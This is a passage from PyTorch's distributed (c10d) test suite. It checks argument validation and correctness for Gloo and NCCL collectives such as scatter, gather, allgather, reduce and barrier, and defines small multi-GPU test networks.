pg.allreduce([t3], opts)
def _test_sparse_allreduce_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
for num_inputs_per_rank in [1, 2]:
tests = simple_sparse_reduce_tests(
self.rank, self.world_size, num_inputs=num_inputs_per_rank
)
for (inputs, outputs) in tests:
tensors = [fn(input) for input in inputs]
work = pg.allreduce(tensors)
work.wait()
self.assertEqual(tensors, outputs)
self.assertEqual(work.result(), outputs)
def test_sparse_allreduce_basics(self):
self._test_sparse_allreduce_basics(lambda t: t)
@skip_if_lt_x_gpu(2)
def test_sparse_allreduce_basics_cuda(self):
self._test_sparse_allreduce_basics(lambda t: t.clone().cuda())
def test_scatter_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1], dtype=torch.float32)
t2 = torch.zeros([1], dtype=torch.float64)
t3 = torch.zeros([2], dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.ScatterOptions()
opts.rootRank = -1
pg.scatter([t1], [], opts)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.ScatterOptions()
opts.rootRank = self.world_size
pg.scatter([t1], [], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element output tensor list"
):
opts = c10d.ScatterOptions()
opts.rootRank = 0
pg.scatter([], [], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element output tensor list"
):
opts = c10d.ScatterOptions()
opts.rootRank = 0
pg.scatter([t1, t1], [], opts)
with self.assertRaisesRegex(ValueError, "requires a single-element input list"):
opts = c10d.ScatterOptions()
opts.rootRank = self.rank
pg.scatter([t1], [], opts)
with self.assertRaisesRegex(ValueError, "requires a single-element input list"):
opts = c10d.ScatterOptions()
opts.rootRank = self.rank
pg.scatter([t1], [[t1] * self.world_size, [t1] * self.world_size], opts)
desired_list_size = self.world_size
incorrect_list_size = self.world_size - 1
err_str = "Incorrect input list size {}. Input list size should be {}"
with self.assertRaisesRegex(
ValueError, err_str.format(incorrect_list_size, desired_list_size)
):
opts = c10d.ScatterOptions()
opts.rootRank = self.rank
pg.scatter([t1], [[t1] * incorrect_list_size], opts)
incorrect_list_size = self.world_size + 1
with self.assertRaisesRegex(
ValueError, err_str.format(incorrect_list_size, desired_list_size)
):
opts = c10d.ScatterOptions()
opts.rootRank = self.rank
pg.scatter([t1], [[t1] * incorrect_list_size], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor type"):
opts = c10d.ScatterOptions()
opts.rootRank = self.rank
pg.scatter([t1], [[t2] * self.world_size], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
opts = c10d.ScatterOptions()
opts.rootRank = self.rank
pg.scatter([t1], [[t3] * self.world_size], opts)
with self.assertRaisesRegex(ValueError, "requires empty input on non-root"):
opts = c10d.ScatterOptions()
opts.rootRank = (self.rank + 1) % self.world_size
pg.scatter([t1], [[t1] * self.world_size], opts)
def _test_scatter_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
# Preallocate tensors for input/output
input = [fn(torch.tensor([self.rank])) for _ in range(self.world_size)]
outputs = [fn(torch.tensor([-1])) for _ in range(self.world_size)]
# Take turns being the scatter root and accumulate work items
work = []
for i in range(self.world_size):
opts = c10d.ScatterOptions()
opts.rootRank = i
if i == self.rank:
work.append(pg.scatter([outputs[i]], [input], opts))
else:
work.append(pg.scatter([outputs[i]], [], opts))
# Wait for work to complete
for i in range(self.world_size):
work[i].wait()
self.assertEqual(torch.tensor([i]), outputs[i])
def test_scatter_basics(self):
self._test_scatter_basics(lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_scatter_basics_cuda(self):
self._test_scatter_basics(lambda t: t.clone().cuda())
def _test_scatter_stress(self, inputs, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
outputs = [
[fn(torch.tensor([-1])) for _ in range(self.world_size)]
for _ in range(len(inputs))
]
work_handles = []
for i in range(len(inputs)):
for root in range(self.world_size):
opts = c10d.ScatterOptions()
opts.rootRank = root
if root == self.rank:
work = pg.scatter(
[outputs[i][root]], [[fn(e) for e in inputs[i]]], opts
)
else:
work = pg.scatter([outputs[i][root]], [], opts)
work_handles.append(work)
for i, work_handle in enumerate(work_handles):
work_handle.wait()
iter = i // self.world_size
root = i % self.world_size
self.assertEqual(
torch.tensor([iter + root]),
outputs[iter][root],
msg=("Mismatch in iteration %d for rank %d" % (iter, root)),
)
def test_scatter_stress(self):
inputs = [
[torch.tensor([i + self.rank]) for _ in range(self.world_size)]
for i in range(1000)
]
self._test_scatter_stress(inputs, lambda t: t.clone())
@unittest.skip("Test is flaky, see https://github.com/pytorch/pytorch/issues/15963")
@skip_if_lt_x_gpu(2)
def test_scatter_stress_cuda(self):
inputs = [
[torch.tensor([i + self.rank]) for _ in range(self.world_size)]
for i in range(1000)
]
self._test_scatter_stress(inputs, lambda t: t.clone().cuda())
def test_gather_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1], dtype=torch.float32)
t2 = torch.zeros([1], dtype=torch.float64)
t3 = torch.zeros([2], dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.GatherOptions()
opts.rootRank = -1
pg.gather([], [t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.GatherOptions()
opts.rootRank = self.world_size
pg.gather([], [t1], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element input tensor list"
):
opts = c10d.GatherOptions()
opts.rootRank = 0
pg.gather([], [], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element input tensor list"
):
opts = c10d.GatherOptions()
opts.rootRank = 0
pg.gather([], [t1, t1], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element output list"
):
opts = c10d.GatherOptions()
opts.rootRank = self.rank
pg.gather([], [t1], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element output list"
):
opts = c10d.GatherOptions()
opts.rootRank = self.rank
pg.gather([[t1] * self.world_size, [t1] * self.world_size], [t1], opts)
desired_list_size = self.world_size
incorrect_list_size = self.world_size - 1
err_str = "Incorrect output list size {}. Output list size should be {}"
with self.assertRaisesRegex(
ValueError, err_str.format(incorrect_list_size, desired_list_size)
):
opts = c10d.GatherOptions()
opts.rootRank = self.rank
pg.gather([[t1] * incorrect_list_size], [t1], opts)
incorrect_list_size = self.world_size + 1
with self.assertRaisesRegex(
ValueError, err_str.format(incorrect_list_size, desired_list_size)
):
opts = c10d.GatherOptions()
opts.rootRank = self.rank
pg.gather([[t1] * incorrect_list_size], [t1], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor type"):
opts = c10d.GatherOptions()
opts.rootRank = self.rank
pg.gather([[t2] * self.world_size], [t1], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
opts = c10d.GatherOptions()
opts.rootRank = self.rank
pg.gather([[t3] * self.world_size], [t1], opts)
with self.assertRaisesRegex(ValueError, "requires empty output on non-root"):
opts = c10d.GatherOptions()
opts.rootRank = (self.rank + 1) % self.world_size
pg.gather([[t1] * self.world_size], [t1], opts)
def _test_gather_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
# Preallocate tensors for input/output
input = [fn(torch.tensor([self.rank]))]
outputs = [fn(torch.tensor([-1])) for _ in range(self.world_size)]
# Take turns being the gather root and accumulate work items
work = []
for i in range(self.world_size):
opts = c10d.GatherOptions()
opts.rootRank = i
if i == self.rank:
work.append(pg.gather([outputs], input, opts))
else:
work.append(pg.gather([], input, opts))
# Wait for work to complete
expected = [torch.tensor([rank]) for rank in range(self.world_size)]
for i in range(self.world_size):
work[i].wait()
if i == self.rank:
self.assertEqual(expected, outputs)
def test_gather_basics(self):
self._test_gather_basics(lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_gather_basics_cuda(self):
self._test_gather_basics(lambda t: t.clone().cuda())
def _test_gather_stress(self, inputs, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
work_handles = []
outputs = [
[[fn(torch.tensor([-1])) for _ in range(self.world_size)]]
for _ in range(len(inputs))
]
expected_outputs = [
[[torch.tensor([i + j]) for j in range(self.world_size)]]
for i in range(len(inputs))
]
for i in range(len(inputs)):
for root in range(self.world_size):
opts = c10d.GatherOptions()
opts.rootRank = root
if root == self.rank:
work = pg.gather(outputs[i], [fn(inputs[i])], opts)
else:
work = pg.gather([], [fn(inputs[i])], opts)
work_handles.append(work)
for i, work_handle in enumerate(work_handles):
work_handle.wait()
iter = i // self.world_size
root = i % self.world_size
if root == self.rank:
self.assertEqual(
expected_outputs[iter],
outputs[iter],
msg=("Mismatch in iteration %d for root %d" % (iter, root)),
)
def test_gather_stress(self):
inputs = [torch.tensor([i + self.rank]) for i in range(1000)]
self._test_gather_stress(inputs, lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_gather_stress_cuda(self):
inputs = [torch.tensor([i + self.rank]).cuda() for i in range(1000)]
self._test_gather_stress(inputs, lambda t: t.clone().cuda())
def test_allgather_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1], dtype=torch.float32)
t2 = torch.zeros([1], dtype=torch.float64)
t3 = torch.zeros([2], dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "requires non-empty input tensor list"):
pg.allgather([], [])
with self.assertRaisesRegex(
ValueError, "requires input/output tensor lists to have the same length"
):
pg.allgather([], [t1])
with self.assertRaisesRegex(
ValueError, "requires input/output tensor lists to have the same length"
):
pg.allgather([[t1] * self.world_size, [t1] * self.world_size], [t1])
with self.assertRaisesRegex(ValueError, "invalid output tensor list"):
pg.allgather([[t1] * (self.world_size - 1)], [t1])
with self.assertRaisesRegex(ValueError, "invalid output tensor list"):
pg.allgather([[t1] * (self.world_size + 1)], [t1])
with self.assertRaisesRegex(ValueError, "invalid tensor type"):
pg.allgather(
[[t1, t1] * (self.world_size), [t1, t1] * (self.world_size)], [t1, t2]
)
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
pg.allgather(
[[t1, t1] * (self.world_size), [t1, t1] * (self.world_size)], [t1, t3]
)
with self.assertRaisesRegex(ValueError, "invalid tensor type"):
pg.allgather([([t1, t2] * (self.world_size))[: self.world_size]], [t1])
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
pg.allgather([([t1, t3] * (self.world_size))[: self.world_size]], [t1])
def _test_allgather_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
# Run with N input tensor per rank
for n in [1, 2, 3]:
input = [fn(torch.tensor([n * self.rank + i])) for i in range(n)]
output = [
[fn(torch.tensor([-1])) for _ in range(n * self.world_size)]
for _ in range(n)
]
expected_output = [
[torch.tensor([i]) for i in range(n * self.world_size)]
for _ in range(n)
]
work = pg.allgather(output, input)
work.wait()
self.assertEqual(expected_output, output)
def test_allgather_basics(self):
self._test_allgather_basics(lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_allgather_basics_cuda(self):
self._test_allgather_basics(lambda t: t.clone().cuda())
def _test_allgather_stress(self, inputs, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
work_handles = []
outputs = [
[[fn(torch.tensor([-1])) for _ in range(self.world_size)]]
for _ in range(len(inputs))
]
expected_outputs = [
[[torch.tensor([i + j]) for j in range(self.world_size)]]
for i in range(len(inputs))
]
for i in range(len(inputs)):
work = pg.allgather(outputs[i], [fn(inputs[i])])
work_handles.append(work)
for i, work_handle in enumerate(work_handles):
work_handle.wait()
self.assertEqual(
expected_outputs[i],
outputs[i],
msg=("Mismatch in iteration %d" % i),
)
def test_allgather_stress(self):
inputs = [torch.tensor([i + self.rank]) for i in range(1000)]
self._test_allgather_stress(inputs, lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_allgather_stress_cuda(self):
inputs = [torch.tensor([i + self.rank]).cuda() for i in range(1000)]
self._test_allgather_stress(inputs, lambda t: t.clone().cuda())
def test_allgather_coalesced_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
dummy_input = [torch.zeros([1], dtype=torch.float32)]
dummy_output_lists = [
[torch.zeros([1], dtype=torch.float32)] for _ in range(self.world_size)
]
# One of output tensors does not match input list.
dummy_output_lists[0] = [torch.zeros([0], dtype=torch.float32)]
with self.assertRaisesRegex(
ValueError, "invalid size of output tensor at index 0"
):
c10d.all_gather_coalesced(dummy_output_lists, dummy_input, pg)
# One of output tensors does not match input list.
dummy_output_lists[0] = [torch.zeros([1], dtype=torch.float64)]
with self.assertRaisesRegex(ValueError, "invalid tensor type at index 0"):
c10d.all_gather_coalesced(dummy_output_lists, dummy_input, pg)
# Output lists have too many elements
dummy_output_lists = [
[torch.zeros([1], dtype=torch.float32)] for _ in range(self.world_size + 1)
]
with self.assertRaisesRegex(
ValueError, "output lists should be equal to world size"
):
c10d.all_gather_coalesced(dummy_output_lists, dummy_input, pg)
# Output is not a list of lists.
dummy_output_lists = [torch.zeros([0], dtype=torch.float32)]
with self.assertRaisesRegex(
RuntimeError, "Invalid function argument.*output_tensor_lists"
):
c10d.all_gather_coalesced(dummy_output_lists, dummy_input, pg)
def test_reduce_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1], dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.ReduceOptions()
opts.rootRank = -1
opts.rootTensor = 0
pg.reduce([t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.ReduceOptions()
opts.rootRank = self.world_size
opts.rootTensor = 0
pg.reduce([t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root tensor"):
opts = c10d.ReduceOptions()
opts.rootRank = self.rank
opts.rootTensor = 1
pg.reduce([t1], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element tensor list"
):
opts = c10d.ReduceOptions()
opts.rootRank = self.rank
opts.rootTensor = 0
pg.reduce([t1, t1], opts)
def _test_reduce_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
for (op, input, output) in simple_reduce_tests(self.rank, self.world_size):
for root in range(self.world_size):
opts = c10d.ReduceOptions()
opts.reduceOp = op
opts.rootRank = root
tmp = fn(input)
work = pg.reduce([tmp], opts)
work.wait()
if root == self.rank:
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(output, tmp)
def test_reduce_basics(self):
self._test_reduce_basics(lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_reduce_basics_cuda(self):
self._test_reduce_basics(lambda t: t.clone().cuda())
def _test_reduce_stress(self, inputs):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
work_handles = []
outputs = []
for i in range(len(inputs)):
for root in range(self.world_size):
opts = c10d.ReduceOptions()
opts.rootRank = root
tmp = inputs[i].clone()
outputs.append(tmp)
work = pg.reduce([tmp], opts)
work_handles.append(work)
for i, work_handle in enumerate(work_handles):
work_handle.wait()
iter = i // self.world_size
root = i % self.world_size
if root == self.rank:
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor(
[
(iter * self.world_size)
+ (self.world_size * (self.world_size - 1) / 2)
]
),
outputs[i],
msg=("Mismatch in iteration %d with root rank %d" % (iter, root)),
)
def test_reduce_stress(self):
inputs = [torch.tensor([i + self.rank]) for i in range(1000)]
self._test_reduce_stress(inputs)
@skip_if_lt_x_gpu(2)
def test_reduce_stress_cuda(self):
inputs = [torch.tensor([i + self.rank]).cuda() for i in range(1000)]
self._test_reduce_stress(inputs)
def test_send_recv_all_to_all(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
# Preallocate tensors for input/output
inputs = [torch.tensor([self.rank]) for _ in range(self.world_size)]
outputs = [torch.tensor([-1]) for _ in range(self.world_size)]
# Issue sends
send_work = []
for i in range(self.world_size):
if i == self.rank:
continue
send_work.append(pg.send([inputs[i]], i, 0))
# Issue recvs
recv_work = []
for i in range(self.world_size):
if i == self.rank:
continue
recv_work.append(pg.recv([outputs[i]], i, 0))
# Wait for sends to complete
for work in send_work:
work.wait()
self.assertTrue(work.is_completed())
# Wait for recvs to complete
for work in recv_work:
work.wait()
self.assertTrue(work.is_completed())
# Test that every output other than our own contains the respective rank
for i in range(self.world_size):
if i == self.rank:
continue
self.assertEqual(torch.tensor([i]), outputs[i])
def test_barrier_implies_wait(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
# Kick off allreduce operations
size = (100, 100)
num = 16
tensors = [torch.full(size, float(i)) for i in range(num)]
for tensor in tensors:
# Note: leak the returned work handle
pg.allreduce(tensor)
# Barrier should ensure all previous work has completed
pg.barrier().wait()
for i, tensor in enumerate(tensors):
self.assertEqual(torch.full(size, float(i * self.world_size)), tensor)
@skip_if_win32()
def test_round_robin(self):
num_process_groups = 2
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d._round_robin_process_groups(
[
c10d.ProcessGroupGloo(
c10d.PrefixStore(str(i), store), self.rank, self.world_size, self.opts()
)
for i in range(num_process_groups)
]
)
# Run a few collectives so that we have called each process group
for _ in range(num_process_groups + 1):
tensor = torch.full([100, 100], float(self.rank))
pg.broadcast(tensor, root=0).wait()
self.assertEqual(torch.full([100, 100], 0.0), tensor)
@skip_if_win32()
def test_round_robin_create_destroy(self):
store = c10d.FileStore(self.file_name, self.world_size)
def create(num, prefix):
return c10d._round_robin_process_groups(
[
c10d.ProcessGroupGloo(
c10d.PrefixStore("%s/%d" % (prefix, i), store),
self.rank,
self.world_size,
self.opts()
)
for i in range(num)
]
)
# Run create/use/destroy twice
for i in range(2):
num_process_groups = 2
pg = create(num=num_process_groups, prefix=i)
for _ in range(3):
tensor = torch.ones([10, 10])
pg.allreduce(tensor).wait()
self.assertEqual(torch.full([10, 10], float(self.world_size)), tensor)
del pg
class ProcessGroupNCCLNoGPUTest(TestCase):
MAIN_PROCESS_RANK = 0
def setUp(self):
self.rank = self.MAIN_PROCESS_RANK
self.world_size = 1
self.file = tempfile.NamedTemporaryFile(delete=False)
self.num_gpus = torch.cuda.device_count()
if self.num_gpus > 0:
raise unittest.SkipTest("GPUs are available, skipping test")
def tearDown(self):
pass
@requires_nccl()
def test_init_no_gpus(self):
store = c10d.FileStore(self.file.name, self.world_size)
with self.assertRaisesRegex(
RuntimeError, "ProcessGroupNCCL is only supported with GPUs, no GPUs found!"
):
c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
@unittest.skipIf(
TEST_WITH_TSAN,
"TSAN is not fork-safe since we're forking in a multi-threaded environment",
)
class ProcessGroupNCCLTest(TestCase):
MAIN_PROCESS_RANK = 0
def setUp(self):
self.rank = self.MAIN_PROCESS_RANK
self.world_size = 1
self.file = tempfile.NamedTemporaryFile(delete=False)
self.num_gpus = torch.cuda.device_count()
if self.num_gpus < 2:
raise unittest.SkipTest("NCCL test requires 2+ GPUs")
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
def tearDown(self):
pass
@requires_nccl()
def test_empty_tensors(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
xs = [torch.cuda.FloatTensor([])]
pg.broadcast(xs).wait()
self.assertEqual(0, xs[0].numel())
pg.allreduce(xs).wait()
self.assertEqual(0, xs[0].numel())
pg.reduce(xs).wait()
self.assertEqual(0, xs[0].numel())
ys = [[torch.cuda.FloatTensor([]) for _ in range(self.world_size)]]
pg.allgather(ys, xs).wait()
for y in ys[0]:
self.assertEqual(0, y.numel())
ys = [torch.cuda.FloatTensor([])]
xs = [[torch.cuda.FloatTensor([]) for _ in range(self.world_size)]]
pg.reduce_scatter(ys, xs).wait()
self.assertEqual(0, ys[0].numel())
@requires_nccl()
def test_broadcast_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def broadcast(xs, rootRank, rootTensor):
opts = c10d.BroadcastOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
work = pg.broadcast(xs, opts)
work.wait()
# for every root tensor
for rt in range(self.num_gpus):
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i]).cuda(i))
broadcast(tensors, self.rank, rt)
for i in range(self.num_gpus):
self.assertEqual(tensors[i], tensors[rt])
@requires_nccl()
def test_allreduce_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce(tensors, op):
opts = c10d.AllreduceOptions()
opts.reduceOp = op
work = pg.allreduce(tensors, opts)
work.wait()
# Sum
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.SUM)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(self.num_gpus * (self.num_gpus + 1) / 2)]),
tensors[i],
)
# Product
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.PRODUCT)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(math.factorial(self.num_gpus))]), tensors[i]
)
# Min
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.MIN)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(torch.tensor([1.0]), tensors[i])
# Max
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.MAX)
for i in range(self.num_gpus):
self.assertEqual(torch.tensor([self.num_gpus]), tensors[i])
for op in (c10d.ReduceOp.BAND, c10d.ReduceOp.BOR, c10d.ReduceOp.BXOR):
with self.assertRaisesRegex(
RuntimeError, "Cannot use " + str(op) + " with NCCL"
):
allreduce(tensors, op)
@requires_nccl()
def test_reduce_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce(xs, rootRank, rootTensor, op=None):
opts = c10d.ReduceOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
if op:
opts.reduceOp = op
work = pg.reduce(xs, opts)
work.wait()
# for every root tensor
for rt in range(self.num_gpus):
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
reduce(tensors, self.rank, rt)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(self.num_gpus * (self.num_gpus + 1) / 2)]),
tensors[rt],
)
for op in (c10d.ReduceOp.BAND, c10d.ReduceOp.BOR, c10d.ReduceOp.BXOR):
with self.assertRaisesRegex(
RuntimeError, "Cannot use " + str(op) + " with NCCL"
):
reduce(tensors, self.rank, rt, op)
@requires_nccl()
def test_allgather_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allgather(output_ts, input_ts):
work = pg.allgather(output_ts, input_ts)
work.wait()
tensors = []
output_ts = [[] for _ in range(self.num_gpus)]
for idx, ls in enumerate(output_ts):
for _ in range(self.world_size * self.num_gpus):
ls.append(torch.tensor([0]).cuda(idx))
for i in range(self.num_gpus):
tensors.append(torch.tensor([i]).cuda(i))
allgather(output_ts, tensors)
# Verification
for device_ts in output_ts:
for s_idx, t in enumerate(device_ts):
self.assertEqual(torch.tensor([s_idx]), t)
@requires_nccl()
def test_reduce_scatter_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce_scatter(outputs, input_lists, op):
opts = c10d.ReduceScatterOptions()
opts.reduceOp = op
work = pg.reduce_scatter(outputs, input_lists, opts)
work.wait()
virtual_rank = self.rank * self.world_size
virtual_world_size = self.num_gpus * self.world_size
output = [torch.tensor([0]).cuda(i) for i in range(self.num_gpus)]
# 0 1 2
# 0 [0..11] [1..12]
# 1 [3..14]
# 2
# 3
# Sum
tensor_lists = [
[
torch.tensor([self.rank * self.num_gpus + i + j]).cuda(i)
for j in range(virtual_world_size)
]
for i in range(self.num_gpus)
]
reduce_scatter(output, tensor_lists, c10d.ReduceOp.SUM)
for i in range(self.num_gpus):
expected = torch.tensor(
[
float(self.num_gpus * (self.num_gpus - 1) / 2)
+ (virtual_rank + i) * virtual_world_size
]
)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected, output[i])
# Min
reduce_scatter(output, tensor_lists, c10d.ReduceOp.MIN)
for i in range(self.num_gpus):
expected = torch.tensor([self.rank * self.world_size + i])
self.assertEqual(expected, output[i])
# Max
reduce_scatter(output, tensor_lists, c10d.ReduceOp.MAX)
for i in range(self.num_gpus):
expected = torch.tensor(
[self.rank * self.world_size + i + virtual_world_size - 1]
)
self.assertEqual(expected, output[i])
# Product
tensor_lists = [
[
torch.tensor(
[(self.rank * self.num_gpus + i + j) % virtual_world_size + 1]
).cuda(i)
for j in range(virtual_world_size)
]
for i in range(self.num_gpus)
]
reduce_scatter(output, tensor_lists, c10d.ReduceOp.PRODUCT)
for i in range(self.num_gpus):
expected = torch.tensor([float(math.factorial(virtual_world_size))])
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected, output[i])
@requires_nccl()
def test_barrier(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce(tensors):
opts = c10d.AllreduceOptions()
work = pg.allreduce(tensors, opts)
return work
# Making the collective to operate on
# 1, 2, 3, 4, .... self.num_gpus GPUs
tensors_list = [[] for _ in range(2, self.num_gpus + 1)]
for i in range(2, self.num_gpus + 1):
for j in range(i):
tensors_list[i - 2].append(torch.tensor([j + 1]).cuda(j))
works = []
for tensors in tensors_list:
work = allreduce(tensors)
works.append(work)
# Barrier will ensure that all previous work is completed
pg.barrier().wait()
for i in range(2, self.num_gpus + 1):
for j in range(i):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(i * (i + 1) / 2)]), tensors_list[i - 2][j]
)
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 50, bias=False)
self.fc3 = nn.Linear(50, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
x = self.fc3(x)
return F.softmax(x, dim=1)
class DoubleGpuNet(nn.Module):
def __init__(self, gpus):
super(DoubleGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[1])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.fc3(x)
return F.softmax(x, dim=1).to(dev0)
class QuadraGpuNet(nn.Module):
def __init__(self, gpus):
super(QuadraGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[2])
self.fc4 = nn.Linear(4, 4, bias=False).to(gpus[3])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
dev2 = self.fc3.weight.device
dev3 = self.fc4.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.relu(self.fc3(x.to(dev2)))
x = self.fc4(x.to(dev3))
return F.softmax(x, dim=1).to(dev0)
class ConvNet(nn.Module):
def __init__(self, gpus, layouts, dtypes):
super(ConvNet, self).__init__()
self.dtypes = dtypes
if isinstance(gpus, list):
self.layer_gpus = gpus
else:
gpus = [gpus] * 4
self.conv0 = torch.nn.Conv2d(8, 16, (2, 2)).to(
